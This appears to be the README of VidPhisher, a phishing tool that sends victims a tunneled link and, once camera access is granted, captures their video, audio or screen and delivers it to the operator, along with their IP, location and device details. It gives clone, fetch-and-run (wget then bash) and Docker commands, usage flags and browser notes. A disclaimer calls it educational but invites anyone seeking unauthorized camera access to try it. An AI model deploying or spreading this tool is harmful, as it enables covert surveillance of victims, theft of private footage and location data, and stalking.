VidPhisher is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her video will be captured and sent to you!
This project is now a part of MaxPhisher. Further bug fixes and feature addition will be available in that
git clone https://github.com/KasRoudra/VidPhisher
cd VidPhisher
For termux, use additional command termux-setup-storage
bash vp.sh
wget https://raw.githubusercontent.com/KasRoudra/VidPhisher/main/vp.sh && bash vp.sh
sudo docker pull kasroudra/vidphisher
sudo docker run --rm -it --name vidphisher kasroudra/vidphisher
sudo docker cp vidphisher:/VidPhisher vidfiles
[Run this on another terminal to copy received video/audio from docker to vidfiles folder keeping container open]
Usage: bash vp.sh [-h] [-o OPTION] [-p PORT] [-t TYPE] [-s DURATION] [-d DIRECTORY] [-u] [-nu]
Options:
-h, --help Show this help message and exit
-o OPTION, --option OPTION Index of the template
-p PORT, --port PORT Port of VidPhisher's Server (Default: 8080)
-t TYPE, --type TYPE Type of media (video or audio or screen, Default: video)
-T TUNNELER, --tunneler TUNNELER Name of the tunneler for url shortening (Default: cloudflared)
-d DIRECTORY, --directory DIRECTORY Directory where images will be saved
-s DURATION, --duration DURATION Duration of media (Default: 5000(ms))
--update(-u), --no-update (-nu) Check for update (Default: true)
- Two Templates
- Get IP, Location, Device type and Browser
- Concurrent double tunneling (Cloudflared and Loclx)
- Choose where to save videos(custom directory)
- Error Diagnoser
- Argument support for templates, type, port, duration and directory
php
curl
wget
unzip
All of the necessary dependencies will be installed automatically in first run!
Edge do not support video capturing. Only audio can be captured from it. Only Firefox supports screen capturing additionally. And most of the rests support video and audio. If browser doesn't block VidPhisher and the victim allows access only then you can capture video/audio
Thanks to Techchip and Muaz Khan for their open source codes!
This tool is developed for educational purposes. Here it demonstrates how camera phishing works. If anybody wants to gain unauthorized access to someones camera, he/she may try out this at his/her own risk. You have your own responsibilities and you are liable to any damage or violation of laws by this tool. The author is not responsible for any misuse of VidPhisher!